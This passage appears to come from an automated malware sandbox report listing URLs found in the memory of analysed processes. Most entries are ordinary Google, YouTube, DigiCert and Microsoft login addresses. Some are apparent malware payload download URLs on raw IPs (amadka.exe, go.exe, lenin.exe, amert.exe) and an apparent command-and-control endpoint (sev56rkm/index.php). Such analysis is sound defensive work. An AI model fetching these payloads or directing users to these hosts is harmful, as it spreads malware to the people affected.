Source: b3168c3d9b.exe, 00000004.00000003.2400801702.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 00000004.00000003.2388488630.00000000010AC000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 00000004.00000003.2384397745.00000000010A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000014.00000003.2342118247.00000000079E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Khttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000014.00000003.2342118247.00000000079E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKILUqSjTYt2f71ZJ2P9hYGW4Hp2Xt35GOU6aMhuUUf_toEQ-l9xZdlwBT30N5fFvMwHQuWC2A equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000014.00000003.2342118247.00000000079E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000014.00000003.2342118247.00000000079E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AaSxoQxldTP1ZW9BUsk3Wko45Z7zSTp6uFI2fviAMsMcrMT9TUwJBbIAW49EqVoHmRNuN2WFIdGs&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S33782673%3A1713900850107375&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: b3168c3d9b.exe, 00000004.00000003.2348077262.0000000003876000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 00000004.00000003.2409233393.000000000389E000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 00000004.00000003.2351504626.0000000003879000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
                                Source: b3168c3d9b.exe, 0000000F.00000003.2491026647.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000002.2498371280.0000000003F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountJ_ equals www.youtube.com (Youtube)
                                Source: b3168c3d9b.exe, 0000000F.00000003.2491026647.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000002.2498371280.0000000003F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account[Y equals www.youtube.com (Youtube)
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.102:57893/hera/amadka.exe
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.102:57893/hera/amadka.exeHK
                                Source: MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.102:57893/hera/amadka.exea
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/0
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/Local
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/a
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/age.Streams.DataWriter
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/erences.SourceAumid
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/f1daa8e86e8e6fbbace30934c49ac47aa495c49#?
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/f1daa8e86e8e8fda7df3081405eac52aa495c49#b
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.php
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.php001
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.php12001
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.php1mb3JtLXVybGVuY29kZWQ=
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.php6Eo
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpL
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpPE
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpUsers
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpWindows
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpX
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpbE
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpcoded
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpcodedlE
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpcodeduE
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phph
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpop
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmp, explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.139/sev56rkm/index.phpu
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exe
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exe.1
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exe1.132f
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exeAK
                                Source: MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/go.exer
                                Source: MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exe
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exe4
                                Source: MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exepro_botC
                                Source: MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exer
                                Source: 2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/lenin.exetK
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/random.exe
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/sarra.exe
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/cost/sarra.exee
                                Source: explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/mine/amert.exe
                                Source: explorta.exe, 00000002.00000002.3253602072.00000000014DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.167/mine/random.exe
                                Source: svchost.exe, 0000001E.00000003.2923000049.000001EFCE589000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905634199.000001EFCE581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905520461.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                                Source: svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2923073504.000001EFCE573000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2705743746.000001EFCE573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                                Source: svchost.exe, 0000001E.00000003.2502477786.000001EFCECC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2498765635.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                                Source: svchost.exe, 0000001E.00000003.2490135541.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3325462458.000001EFCEC8A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2489362309.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                                Source: svchost.exe, 0000001E.00000003.2490135541.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2489362309.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbE%
                                Source: svchost.exe, 0000001E.00000002.3329736359.000001EFCECB8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: svchost.exe, 00000006.00000002.3326223152.000002AF2AC00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                                Source: svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2491144426.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2488466722.000001EFCE57A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2703336556.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2703702572.000001EFCE578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2500832032.000001EFCE57A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905634199.000001EFCE581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2375556720.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905520461.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                                Source: svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAA
                                Source: svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAA
                                Source: svchost.exe, 0000001E.00000003.2703702572.000001EFCE578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2500832032.000001EFCE57A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
                                Source: svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2375556720.000001EFCE552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905520461.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                                Source: svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
                                Source: svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2488466722.000001EFCE57A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                                Source: svchost.exe, 0000001E.00000002.3360389667.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3325172143.000001EFCEC53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
                                Source: svchost.exe, 00000006.00000002.3273860235.000002AF25D02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2878763604.000002AF2A992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/an2dmhqv5igncgwzelkqyugk5q_2024.4.19.0/go
                                Source: svchost.exe, 00000006.00000003.2089816565.000002AF2A990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                Source: svchost.exe, 00000006.00000003.3165237587.000002AF25D1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3165437653.000002AF2B010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                Source: svchost.exe, 0000001E.00000002.3325518723.000001EFCECA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3276271710.000001EFCDC85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                                Source: svchost.exe, 0000001E.00000003.2702970756.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                                Source: svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                                Source: svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2473225757.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                                Source: svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905634199.000001EFCE581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905520461.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                                Source: svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scdn
                                Source: svchost.exe, 0000001E.00000002.3324680464.000001EFCE582000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905634199.000001EFCE581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905520461.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scst
                                Source: svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                                Source: svchost.exe, 0000001E.00000003.2502477786.000001EFCECC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2498765635.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                                Source: svchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesue
                                Source: svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue
                                Source: svchost.exe, 0000001E.00000002.3308028724.000001EFCDCE1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                                Source: svchost.exe, 0000001E.00000003.2356389509.000001EFCE56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                                Source: svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfr
                                Source: svchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                                Source: svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                                Source: svchost.exe, 0000001E.00000003.2356389509.000001EFCE56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                                Source: svchost.exe, 0000001E.00000003.2354397715.000001EFCE52C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356389509.000001EFCE56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
